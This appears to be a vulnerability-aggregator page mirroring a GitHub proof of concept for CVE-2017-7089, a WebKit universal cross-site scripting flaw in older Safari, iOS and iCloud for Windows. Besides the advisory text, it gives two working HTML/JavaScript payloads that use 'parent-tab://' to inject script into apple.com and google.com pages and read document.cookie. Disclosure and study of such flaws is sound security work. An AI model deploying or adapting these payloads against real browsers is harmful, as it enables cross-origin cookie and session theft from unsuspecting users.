CVE-2017-7089 PoC — Apple iOS、Safari和iCloud for Windows WebKit 安全漏洞

Source

https://github.com/Bo0oM/CVE-2017-7089

Associated Vulnerability

Title:Apple iOS、Safari和iCloud for Windows WebKit 安全漏洞 (CVE-2017-7089)
Description:An issue was discovered in certain Apple products. iOS before 11 is affected. Safari before 11 is affected. iCloud before 7.0 on Windows is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site that is mishandled during parent-tab processing.

Description

Webkit uxss exploit (CVE-2017-7089)

Readme

# CVE-2017-7089

**Impact**: Processing maliciously crafted web content may lead to universal cross site scripting

**Description**: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.

#### Safari 10

##### Local SOP bypass

```html
<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>
```
##### Exploit by Frans Rosén
```html
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>
```

File Snapshot


 [4.0K]  /data/pocs/301a449042e7ed38d024ff9c9ddd1d998fdaaddd
├── [ 319]  index.html
└── [ 708]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!